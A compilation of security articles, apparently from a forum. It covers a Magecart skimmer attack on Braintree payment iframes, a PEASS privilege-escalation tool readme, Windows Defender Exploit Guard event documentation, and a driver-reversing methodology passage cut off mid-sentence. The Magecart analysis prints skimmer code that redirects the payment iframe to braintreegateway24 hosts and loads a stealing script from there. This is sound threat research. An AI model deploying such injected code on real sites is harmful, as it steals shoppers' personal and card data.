/^https:\/\/([a-zA-Z0-9-]+\.)*(braintreepayments|braintreegateway|paypal|braintreegateway24)\.[a-z]+(:\d{1,5})?$/; e.exports = { checkOrigin: i } } var u = t(15), l = document.createElement("a"), h = [ "paypal.com", "braintreepayments.com", "braintreegateway.com", "braintreegateway24.tech", "braintreegateway24.com", "localhost", ]; e.exports = { isBrowserHttps: i, makeQueryString: r, decodeQueryString: s, getParams: a, isWhitelistedDomain: c, }; To allow running a skimmer inside the hosted iframe, the script replaces the hosted field iframe’s address with the address of another attacker controlled domain. (r = c({ type: p, name: "braintree-hosted-field-" + p, style: h.defaultIFrameStyle, })), this.injectedNodes.push(i(r, n)), this.setupLabelFocus(p, n), (m[p] = { frameElement: r, containerElement: n, }), g++, setTimeout( (function(e) { return function() { var loa = l(t.gatewayConfiguration.assetsUrl, t.channel); loa = loa.replace( "assets.braintreegateway.com/hosted-fields/2.25.0", "braintreegateway24.tech/hosted-fields/2.25" ); e.src = loa; }; })(r), 0 ); Step 3: Injecting the skimmer scrip The attacker controlled client script injects a file named “helper.js”, which runs in the context of the checkout page which steals the user name, address, phone number, etc, but not the payment details which are only accessible from within the hosted iframes. var s2 = document.createElement("script"); s2.setAttribute("src", "https://braintreegateway24.com/js/helper.js"); document .getElementsByTagName("head") .item(0) .appendChild(s2); Step 4: Injecting the hosted iframe with skimmer script Due to the change in step 2, the browser now loads the iframe from a domain the attacker controls. The attacker controlled iframe will load the Braintree credit card collector, along with an additional skimmer script in the same iframe context which will allow it to access the private details. This effectively bypasses the SOP protection the payment iframe would have solved. Figure: Compromised Braintree skimmer script loaded on the web page These 4 steps allow the attacker to steal all the needed payment details for online transactions, while still continuing the checkout flow and allowing the real transaction to be accepted on the first attempt. PayPal approves the transaction as it is not fraudulent even though the payment details were stolen in the process. The website admin and consumer will not be alerted in any way allowing the operation to stay undetected. Figure: Order success page on an infected website indicating that the payment transaction was successful PayPal’s Response We disclosed this issue to Braintree and Paypal, as well as the infected website identified in this attack. PayPal’s team were quick to review the case and provide a response. PayPal’s position is that this attack requires an XSS context already in place and that they cannot be responsible for the web application security of their customers’ websites. Their payment gateway still accepts transactions from the modified version of the script which also steals credit card numbers at the same time. Iframes do not protect the website in this scenario. Preventing digital skimming and Magecart attacks is ultimately the responsibility of the website owner. We were unable to get a response from the infected site’s owners despite repeated requests to the website administrators and even their sales team. Iframe Protection Cannot Stop Magecart Attacks While iframe protection helps the site comply with PCI DSS standards, compliance does not equal security. In this case, the website doesn’t hold the credit card information, PayPal only approves legitimate transactions initiated by legitimate users and yet the credit card numbers and CVV were stolen. The PCI Security Standards Council (PCI SSC) and the Retail and Hospitality ISAC issued a joint bulletin in August 2019 highlighting that digital skimming and Magecart attacks require urgent attention. “There are ways to prevent these difficult-to-detect attacks however. A defense-in-depth approach with ongoing commitment to security, especially by third-party partners, will help guard against becoming a victim of this [Magecart] threat.” - Troy Leach, Chief Technology Officer (CTO) of the PCI Security Standards Council. Ultimately, e-commerce businesses are responsible for ensuring a safe and secure user experience for their customers. If credit card numbers are stolen from their website, it hurts their brand reputation and exposes them to liability and regulatory fines. As we have seen in this attack, iframes are not a foolproof solution for protection against the Magecart threat. Businesses must use client-side visibility solutions to detect such attacks and mitigate them quickly. For more updates on emerging Magecart attacks, subscribe to the PerimeterX blog. Indicators of Compromise Compromised website: https://ricambipoltroneelettriche[.]salesource[.]it/checkout#payment Modified version of Braintree: Malicious client side JavaScript: https://braintreegateway24[.]com/js/braintree-2.32.min.js Malicious iframes: https://braintreegateway24[.]tech/hosted-fields/2.25/hosted-fields-frame.html Sursa: https://www.perimeterx.com/resources/blog/2020/new-stealth-magecart-attack-bypasses-payment-services-using-iframes/
-
PEASS - Privilege Escalation Awesome Scripts SUITE Here you will find privilege escalation tools for Windows and Linux/Unix* (in some near future also for Mac). These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily. Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz WinPEAS - Windows local Privilege Escalation Awesome Script (C#.exe and .bat) Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) Let's improve PEASS together If you want to add something and have any cool idea related to this project, please let me know it in the telegram group https://t.me/peass or using github issues and we will update the master version. Please, if this tool has been useful for you consider to donate Looking for a useful Privilege Escalation Course? Contact me and ask about the Privilege Escalation Course I am preparing for attackers and defenders (100% technical). Advisory All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. License MIT License By Polop(TM) Sursa: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
-
Exploit Protection Event Documentation Last updated: 10/15/19 Research by: Matthew Graeber @ SpecterOps Associated Blog Post: https://medium.com/palantir/assessing-the-effectiveness-of-a-new-security-data-source-windows-defender-exploit-guard-860b69db2ad2 One of the most valuable features of WDEG are the Windows event logs generated when a security feature is triggered. While documentation on configuration (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/customize-exploit-protection) and deployment (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/import-export-exploit-protection-emet-xml) of WDEG is readily accessible, documentation on what events WDEG supports, and the context around them, does not exist. The Palantir CIRT is of the opinion that the value of an event source is realized only upon documenting each field, applying context around the event, and leveraging these as discrete detection capabilities. WDEG supplies events from multiple event sources (ETW providers) and destinations (event logs). In the documentation that follows, events are organized by their respective event destination. Additionally, many events use the same event template and are grouped accordingly. Microsoft does not currently document these events and context was acquired by utilizing documented ETW methodology (https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63), reverse engineering, and with support from security researchers (James Forshaw (https://twitter.com/tiraniddo) and Alex Ionescu (https://twitter.com/aionescu)) generously answering questions on Windows internals. Event Log: Microsoft-Windows-Security-Mitigations/KernelMode Events Consisting of Process Context Event ID 1 - Arbitrary Code Guard (ACG) Auditing Message: "Process '%2' (PID %5) would have been blocked from generating dynamic code." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitDynamicCode Description: ACG (https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/) prevents/logs attempted permission modification of code pages (making a page writeable, specifically) and prevents unsigned code pages from being created. Event ID 2 - Arbitrary Code Guard (ACG) Enforcement Message: "Process '%2' (PID %5) was blocked from generating dynamic code." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitDynamicCode Event ID 7 - Audit: Log Remote Image Loads Message: "Process '%2' (PID %5) would have been blocking from loading a binary from a remote share." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitRemoteImageMap Description: Prevents/logs the loading of images from remote UNC/WebDAV shares, a common exploitation/dll hijack primitive used (https://www.rapid7.com/db/modules/exploit/windows/browser/ms10_046_shortcut_icon_dllloader) to load subsequent attacker code from an attacker-controlled location. Event ID 8 - Enforce: Block Remote Image Loads Message: "Process '%2' (PID %5) was blocked from loading a binary from a remote share." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitRemoteImageMap Event ID 9 - Audit: Log Win32K System Call Table Use Message: "Process '%2' (PID %5) would have been blocked from making system calls to Win32k.sys." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitWin32kSystemCalls Description: A user-mode GUI thread attempted to access the Win32K syscall table. Win32K syscalls are used frequently to trigger elevation of privilege (https://www.slideshare.net/PeterHlavaty/rainbow-over-the-windows-more-colors-than-you-could-expect) and sandbox escape vulnerabilities (https://improsec.com/tech-blog/win32k-system-call-filtering-deep-dive). For processes that do not intend to perform GUI-related tasks, Win32K syscall auditing/enforcement can be valuable. Event ID 10 - Enforce: Prevent Win32K System Call Table Use Message: "Process '%2' (PID %5) was blocked from making system call s to Win32k.sys." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitWin32kSystemCalls Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. CallingProcessId The process ID of the process that triggered the event. CallingProcessCreateTime The creation time of the process that triggered the event. CallingProcessStartKey This field represents a locally unique identifier for the process. It was designed as a more robust version of process ID that is resistant to being repeated. Process start key was introduced in Windows 10 1507 and is derived from _KUSER_SHARED_DATA.BootId and EPROCESS.SequenceNumber, both of which increment and are unlikely to overflow. It is an unsigned 64-bit value that is derived using the following logic: (BootId << 30) | SequenceNumber. Kernel drivers can retrieve the process start key for a process by calling the PsGetProcessStartKey export in ntoskrnl.exe. A process start key can also be derived from user-mode (https://gist.github.com/mattifestation/3c2e8f80ca1fe1a7e276ee2607da8d18). CallingProcessSignatureLevel The signature level of the process executable. This is the validated signing level for the process when it was started. This field is populated from EPROCESS.SignatureLevel. Signature level can be any of the following values: 0x0 - Unchecked 0x1 - Unsigned 0x2 - Enterprise 0x3 - Custom1 0x4 - Authenticode 0x5 - Custom2 0x6 - Store 0x7 - Antimalware 0x8 - Microsoft 0x9 - Custom4 0xA - Custom5 0xB - DynamicCodegen 0xC - Windows 0xD - WindowsProtectedProcessLight 0xE - WindowsTcb 0xF - Custom6 CallingProcessSectionSignatureLevel The section signature level is the default required signature level for any modules that get loaded into the process. The same values as ProcessSignatureLevel are supported. This field is populated from EPROCESS.SectionSignatureLevel. The following are some example process and process section signature levels that you might realistically encounter: ProcessSignatureLevel: 8, ProcessSectionSignatureLevel: 6. This indicates that a Microsoft-signed host process will only load images with a Store signature at a minimum. Thanks to Alex Ionescu for pointing out this example scenario. ProcessSignatureLevel: 2, ProcessSectionSignatureLevel: 2. This indicates that both process and module loading are dictated by Windows Defender Application Control (WDAC) policy. ProcessSignatureLevel: 0, ProcessSectionSignatureLevel: 0. This would indicate that signature level enforcement for process and module loading is not enforced. CallingProcessProtection The type of protected process and the protected process signer. This field is populated from EPROCESS.Protection and corresponds to the PS_PROTECTION structure. These values are well documented in Windows Internals: Volume 7. The first 3 bits contain the type of protected process (refers to the low nibble of the value): PsProtectedTypeNone - 0 PsProtectedTypeProtectedLight - 1 PsProtectedTypeProtected - 2 The top 4 bits contain the protected process signer (refers to the high nibble of the value): PsProtectedSignerNone - 0 PsProtectedSignerAuthenticode - 1 PsProtectedSignerCodeGen - 2 PsProtectedSignerAntimalware - 3 PsProtectedSignerLsa - 4 PsProtectedSignerWindows - 5 PsProtectedSignerWinTcb - 6 PsProtectedSignerWinSystem - 7 PsProtectedSignerApp - 8 Here are some example process protection values: 0x31 - A PPL, antimalware process 0x62 - A protected, WinTCB process CallingThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. CallingThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. Child Process Creation Events Event ID 3 - Audit: Child Process Creation Message: “Process '%2' (PID %5) would have been blocked from creating a child process '%14' with command line '%16'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitChildProcessCreation Description: log/prevents child process creation Event ID 4 - Enforce: Prevent Child Process Creation Message: “Process '%2' (PID %5) was blocked from creating a child process '%14' with command line '%16'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitChildProcessCreation Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. CallingProcessId The process ID of the process that triggered the event. CallingProcessCreateTime The creation time of the process that triggered the event. CallingProcessStartKey See section above. CallingProcessSignatureLevel See section above. CallingProcessSectionSignatureLevel See section above. CallingProcessProtection See section above. CallingThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. CallingThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. ChildImagePathNameLength The length, in characters, of the string in the ChildImagePathName field. ChildImagePathName The path to the image that is attempting to load. ChildCommandLineLength The length, in characters, of the string in the ChildCommandLine field. ChildCommandLine The command line of the image that is attempting to load. Low Integrity Image Load Events Event ID 5 - Audit: low integrity image load Message: “Process '%2' (PID %5) would have been blocked from loading the low-integrity binary '%14'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitLowILImageMap Event ID 6 - Enforce: block low integrity image load Message: “Process '%2' (PID %5) was blocked from loading the low-integrity binary '%14'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitLowILImageMap Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. ProcessId The process ID of the process that triggered the event. ProcessCreateTime The creation time of the process that triggered the event. ProcessStartKey See section above. ProcessSignatureLevel See section above. ProcessSectionSignatureLevel See section above. ProcessProtection See section above. TargetThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. TargetThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. ImageNameLength The length, in characters, of the string in the ImageName field. ImageName The name of the image that attempted to load with low integrity. Non-Microsoft Binary Load Events Event ID 11 - Audit: A non-Microsoft-signed binary would have been loaded. Message: “Process '%2' (PID %5) would have been blocked from loading the non-Microsoft-signed binary '%16'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitNonMicrosoftBinaries Description: This event is logged any time a PE is loaded into a process that is not Microsoft-signed. Event ID 12 - Enforce: A non-Microsoft-signed binary was prevented from loading. Message: “Process '%2' (PID %5) was blocked from loading the non-Microsoft-signed binary '%16'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitNonMicrosoftBinaries Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary into which a non-MSFT binary attempted to load. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process into which a non-MSFT binary attempted to load. ProcessId The process ID of the process into which a non-MSFT binary attempted to load. ProcessCreateTime The creation time of the process into which a non-MSFT binary attempted to load. ProcessStartKey See section above. ProcessSignatureLevel See section above. ProcessSectionSignatureLevel See section above. ProcessProtection See section above. TargetThreadId The thread ID of the thread responsible for attempting to load the non-MSFT binary. This field is populated from ETHREAD.Cid.UniqueThread. TargetThreadCreateTime The creation time of the thread responsible for attempting to load the non-MSFT binary. This field is populated from ETHREAD.CreateTime. RequiredSignatureLevel The minimum signature level being imposed by WDEG. The same values as ProcessSignatureLevel are supported. This value will either be 8 in the case of Microsoft-signed binaries only or 6 in the case where Store images are permitted. SignatureLevel The validated signature level of the image present in the ImageName field. The same values as ProcessSignatureLevel are supported. A value less than RequiredSignatureLevel indicates the reason why EID 11/12 was logged in the first place. When this event is logged, SignatureLevel will always be less than RequiredSignatureLevel. ImageNameLength The length, in characters, of the string in the ImageName field. ImageName The full path to the image that attempted to load into the host process. Event Log: Microsoft-Windows-Security-Mitigations/UserMode Export/Import Address Table Access Filtering (EAF/IAF) Events Event ID 13 - EAF mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Export Address Table for module '%8'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Description: The export address table was accessed by code that is not backed by an image on disk - i.e. injected shellcode is the likely culprit for access the EAT. Event ID 14 - EAF mitigation enforced “Process '%2' (PID %3) was blocked from accessing the Export Address Table for module '%8'." Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Event ID 15 - EAF+ mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Export Address Table for module '%8'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Description: The export address table was accessed by code that is not backed by an image on disk and via many other improved heuristics - i.e. injected shellcode is the likely culprit for access the EAT. Event ID 16 - EAF+ mitigation enforced Message: “Process '%2' (PID %3) was blocked from accessing the Export Address Table for module '%8'." Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Event ID 17 - IAF mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Import Address Table for API '%10'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibProcessIAFGuardPage Description: The import address table was accessed by code that is not backed by an image on disk. Event ID 18 - IAF mitigation enforced Message: “Process '%2' (PID %3) was blocked from accessing the Import Address Table for API '%10'." Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibProcessIAFGuardPage Event Properties Subcode Specifies a value in the range of 1-4 that indicates how how the event was triggered. 1 - Indicates that the classic EAF mitigation was triggered. This subcode is used if the instruction pointer address used to access the EAF does not map to a DLL that was loaded from disk (ntdll!RtlPcToFileHeader (https://docs.microsoft.com/en-us/windows/desktop/api/winnt/nf-winnt-rtlpctofileheader) is used to make this determination). 2 - Indicates that the stack registers ([R|S]P and [R|E]BP) fall outside the stack extent of the current thread. This is one of the EAF+ mitigations. 3 - Indicates that a memory reader gadget was used to access the EAF. PayloadRestrictions.dll statically links a disassembler library that attempts to make this determination. This is one of the EAF+ mitigations. 4 - Indicates that the IAF mitigation triggered. This also implies that the APIName property will be populated. ProcessPath The full path of the process in which the EAF/IAF mitigation triggered. ProcessId The process ID of the process in which the EAF/IAF mitigation triggered. ModuleFullPath The full path of the module that caused the mitigation to trigger. This value will be empty if the subcode value is 1. ModuleBase The base address of the module that caused the mitigation to trigger. This value will be 0 if the subcode value is 1. ModuleAddress The instruction pointer address ([R|E]IP) upon the mitigation triggering. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemAddress The virtual address that was accessed within a protected module that triggered a guard page exception. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemModuleFullPath The full path of the protected module that was accessed. This string is obtained from LDR_DATA_TABLE_ENTRY.FullDllName in the PEB. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemModuleBase The base address of the protected module that was accessed. APIName The blacklisted export function name that was accessed. This property is only applicable to the IAF mitigation. The following APIs are included in the blacklist: GetProcAddressForCaller, LdrGetProcedureAddress, LdrGetProcedureAddressEx, CreateProcessAsUserA, CreateProcessAsUserW, GetModuleHandleA, GetModuleHandleW, RtlDecodePointer, DecodePointer. ProcessStartTime The creation time of the process specified in ProcessPath/ProcessId. The process time is obtained by calling NtQueryInformationProcess (https://docs.microsoft.com/en-us/windows/desktop/api/winternl/nf-winternl-ntqueryinformationprocess) with ProcessTimes as the ProcessInformationClass argument. The process time is obtained from the CreateTime field of the KERNEL_USER_TIMES structure. ThreadId The thread ID of the thread that generated the event. Return-Oriented Programming (ROP) Events Event ID 19 - ROP mitigation audited: Stack Pivot Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibNotifyStackPivotViolation Description: A ROP stack pivot was detection by observing that the stack pointer fell outside the stack extent (stack base and stack limit) for the current thread. Event ID 20 - ROP mitigation enforced: Stack Pivot Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibNotifyStackPivotViolation Event ID 21 - ROP mitigation audited: Caller Checks Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibRopCheckCaller Description: This event is logged if one of the functions listed in the HookedAPI section below was not called with a call instruction - e.g. called with via a RET instruction. Event ID 22 - ROP mitigation enforced: Caller Checks Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibRopCheckCaller Event ID 23 - ROP mitigation audited: Simulate Execution Flow Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibRopCheckSimExecFlow Description: The simulate execution flow mitigation simulates continued execution of any of the functions listed in HookedAPI section and if any of the return logic along the stack resembles ROP behavior, this event is triggered. Event ID 24 - ROP mitigation enforced: Simulate Execution Flow Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibRopCheckSimExecFlow Event Properties Subcode Specifies a value in the range of 5-7 that indicates how how the event was triggered. 5 - Indicates that the stack pivot ROP mitigation was triggered. 6 - Indicates that the “caller checks" ROP mitigation was triggered. 7 - Indicates that the “simulate execution flow" ROP mitigation was triggered. ProcessPath The full path of the process in which the ROP mitigation triggered. ProcessId The process ID of the process in which the ROP mitigation triggered. HookedAPI The name of the monitored API that triggered the event. The following hooked APIs are monitored: LoadLibraryA, LoadLibraryW, LoadLibraryExA, LoadLibraryExW, LdrLoadDll, VirtualAlloc, VirtualAllocEx, NtAllocateVirtualMemory, VirtualProtect, VirtualProtectEx, NtProtectVirtualMemory, HeapCreate, RtlCreateHeap, CreateProcessA, CreateProcessW, CreateProcessInternalA, CreateProcessInternalW, NtCreateUserProcess, NtCreateProcess, NtCreateProcessEx, CreateRemoteThread, CreateRemoteThreadEx, NtCreateThreadEx, WriteProcessMemory, NtWriteVirtualMemory, WinExec, LdrGetProcedureAddressForCaller, GetProcAddress, GetProcAddressForCaller, LdrGetProcedureAddress, LdrGetProcedureAddressEx, CreateProcessAsUserA, CreateProcessAsUserW, GetModuleHandleA, GetModuleHandleW, RtlDecodePointer, DecodePointer ReturnAddress I was unable to spend too much time reversing PayloadRestrictions.dll to how this property is populated but based on fired events and inference, this property indicates the return address for the current stack frame that triggered the ROP event. A return address that pointed to an address in the stack or to an address of another ROP gadget (a small sequence of instructions followed by a return instruction) would be considered suspicious. CalledAddress This appears to be the address of the hooked, blacklisted API that was called by the potential ROP chain. TargetAddress This value appears to be the target call/jump address of the ROP gadget to which control was to be transferred via non-traditional means. The TargetAddress value is zero when the “simulate execution flow" ROP mitigation was triggered. StackAddress The stack address triggering the stack pivot ROP mitigation. This value only populated with the stack pivot ROP mitigation. The StackAddress value is zero when the “simulate execution flow" and “caller checks" ROP mitigations are triggered. When StackAddress is populated, it would indicate that the stack address falls outside the stack extent (NT_TIB StackBase/StackLimit range) for the current thread. FrameAddress This value is zeroed out in code so it is unclear what it’s intended purpose is. ReturnAddressModuleFullPath The full path of the module that is backed by the ReturnAddress property (via ntdll!RtlPcToFileHeader and ntdll!LdrGetDllFullName). If ReturnAddress is not backed by a disk-backed module, this property will be empty. ProcessStartTime The creation time of the process specified in ProcessPath/ProcessId. The process time is obtained by calling NtQueryInformationProcess (https://docs.microsoft.com/en-us/windows/desktop/api/winternl/nf-winternl-ntqueryinformationprocess) with ProcessTimes as the ProcessInformationClass argument. The process time is obtained from the CreateTime field of the KERNEL_USER_TIMES structure. ThreadId The thread ID of the thread that generated the event. Event Log: Microsoft-Windows-Win32k/Operational Event ID 260 - A GDI-based font not installed in the system fonts directory was prevented from being loaded Message: “%1 attempted loading a font that is restricted by font loading policy. FontType: %2 FontPath: %3 Blocked: %4" Level: 0 (Log Always) Function that generates the event: win32kbase!EtwFontLoadAttemptEvent Description: This mitigation is detailed in this blog post (http://blogs.360.cn/post/windows10_font_security_mitigations.html). Event Properties SourceProcessName Specifies the name of the process that attempted to load the font. SourceType Refers to an undocumented W32KFontSourceType enum that based on calls to win32kfull!ScrutinizeFontLoad can be any of the following values: 0 - “LoadPublicFonts" - Supplied via win32kfull!bCreateSectionFromHandle () 1 - “LoadMemFonts" - Supplied via win32kfull!PUBLIC_PFTOBJ::hLoadMemFonts 2 - “LoadRemoteFonts" - Supplied via win32kfull!PUBLIC_PFTOBJ::bLoadRemoteFonts 3 - “LoadDeviceFonts" - Supplied via win32kfull!DEVICE_PFTOBJ::bLoadFonts FontSourcePath Specifies the path to the font that attempted to load. Blocked A value of 1 specifies that the font was blocked from loading. A value of 0 indicates that the font was allowed to load but was logged. Event Log: System Event ID 5 - Control Flow Guard (CFG) Violation Event source: Microsoft-Windows-WER-Diag Message: “CFG violation is detected." Level: 0 (Log Always) Function that generates the event: werfault!CTIPlugin::NotifyCFGViolation Description: A description of the CFG mitigation can be found here (https://docs.microsoft.com/en-us/windows/desktop/SecBP/control-flow-guard). Specific event field documentation could not be completed in a reasonable amount of time. Event Properties AppPath ProcessId ProcessStartTime Is64Bit CallReturnAddress CallReturnModName CallReturnModOffset CallReturnInstructionBytesLength CallReturnInstructionBytes CallReturnBaseAddress CallReturnRegionSize CallReturnState CallReturnProtect CallReturnType TargetAddress TargetModName TargetModOffset TargetInstructionBytesLength TargetInstructionBytes TargetBaseAddress TargetRegionSize TargetState TargetProtect TargetType Sursa: https://github.com/palantir/exploitguard
-
Methodology for Static Reverse Engineering of Windows Kernel Drivers Matt Hand Follow Apr 15 · 13 min read Introduction Attacks against Windows kernel mode software drivers, especially those published by third parties, have been popular with many threat groups for a number of years. Popular and well-documented examples of these vulnerabilities are the CAPCOM.sys arbitrary function execution, Win32k.sys local privilege escalation, and the EternalBlue pool corruption. Exploiting drivers offers interesting new perspectives not available to us in user mode, both through traditional exploit primitives and abusing legitimate driver functionalities. As Windows security continues to evolve, exploits in kernel mode drivers will become more important to our offensive tradecraft. To aid in the research of these vulnerabilities, I felt it was important to demonstrate the kernel bug hunting methodology I have employed in my research to find interesting and abusable functionality. In this post, I’ll first cover the most important pieces of prerequisite knowledge required to understand how drivers work and then we’ll jump into the disassembler to walk through finding the potentially vulnerable internal functions. Note: This will include gross oversimplifications of complex topics. I will include links along the way to additional resources, but a full post on driver development and internals would be far too long and not immediately relevant. Target Identification & Selection The first thing I typically look for on an engagement is what drivers are loaded on the base workstation and server images. If a bug is found in these core drivers, most of the fleet will be affected. This also has the added bonus of not requiring a new driver to be dropped and loaded which could tip off defenders. To do this, I will either manually review drivers in the registry (HKLM\System\ControlSet\Services\ where Type is 0x1 and ImagePath contains *.sys)or use tooling like DriverQuery to run through C2. Target selection is a mixed bag because there isn’t one specific type of driver that is more vulnerable than others. That being said, will typically look drivers published by security vendors, anything published by the motherboard manufacturer, and performance monitoring software. I tend to exclude drivers published by Microsoft only because I usually don’t have the time required to really dig in. Driver Internals Primer Kernel mode software drivers seem far more complex than they truly are if you haven’t developed one before. There are 3 important concepts that you must first understand before we start reversing — DriverEntry, IRP handlers, and IOCTLs. DriverEntry Much like the main() function that you may be familiar with in C/C++ programming, a driver must specify an entry point, DriverEntry. DriverEntry has many responsibilities, such as creating the device object and symbolic link used for communication with the driver and definitions of key functions (IRP handlers, unload functions, callback routines, etc.). DriverEntry first creates the device object with a call to IoCreateDevice() or IoCreateDeviceSecure(), the latter typically being used to apply a security descriptor to the device object in order to restrict access to only local administrators and NT AUTHORITY\SYSTEM. Next, DriverEntry uses IoCreateSymbolicLink() with the previously created device object to set up a symbolic link which will allow for user mode processes to communicate with the driver. Here’s how this looks in code: The last thing that DriverEntry does is defines the functions for IRP handlers. IRP Handlers Interrupt Request Packets (IRPs) are essentially just an instruction for the driver. These packets allow the driver to act on the specific major function by providing the relevant information required by the function. There are many major function codes but the most common ones are IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL. These correlate with user mode functions: IRP_MJ_CREATE → CreateFile IRP_MJ_CLOSE → CloseFile IRP_MJ_DEVICE_CONTROL → DeviceIoControl Definitions in DriverEntry may look like this: DriverObject->MajorFunction[IRP_MJ_CREATE] = MyCreateCloseFunction; DriverObject->MajorFunction[IRP_MJ_CLOSE] = MyCreateCloseFunction; DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyDeviceControlFunction; When the following code in user mode is executed, the driver will receive an IRP with the major function code IRP_MJ_CREATE and will execute the MyCreateCloseFunction function: hDevice = CreateFile(L"\\\\.\\MyDevice", GENERIC_WRITE|GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); The most important major function for us in almost all cases will be IRP_MJ_DEVICE_CONTROL as it is used to send requests to perform a specific internal function from user mode. These requests include an IO Control Code which tells the driver exactly what to do, as well as a buffer to send data to and receive data from the driver. IOCTLs IO Control Codes (IOCTLs) are our primary search target as they include numerous important details we need to know. They are represented as DWORDs but each of the 32 bits represent a detail about the request — Device Type, Required Access, Function Code, and Transfer Type. Microsoft created a visual diagram to break these fields down: Transfer Type - Defines the way that data will be passed to the driver. These can either be METHOD_BUFFERED, METHOD_IN_DIRECT, METHOD_OUT_DIRECT, or METHOD_NEITHER. Function Code - The internal function to be executed by the driver. These are supposed to start at 0x800 but you will see many starting at 0x0 in practice. The Custom bit is used for vendor-assigned values. Device Type - The type of the driver’s device object specified during IoCreateDevice(Secure)(). There are many device types defined in Wdm.h and Ntddk.h, but one of the most common to see for software drivers is FILE_DEVICE_UNKNOWN (0x22). The Common bit is used for vendor-assigned values. An example of what these are defined as in the driver’s headers is: #define MYDRIVER_IOCTL_DOSOMETHING CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS) It is entirely possible to decode these values yourself, but if you’re feeling lazy like I often am, OSR has their online decoder and the !ioctldecode Windbg extension has worked great for me in a pinch. These specifics will become more important when we write the application to interface with the target driver. In the disassembler, they will still be represented in hex. Putting it all Together I know it’s like drinking from the firehose, but you can simplify it and think about it like sending a network packet. You craft the packet with whatever details you need, send it to the server for processing, it does something with it or ignores you, and then gives you back 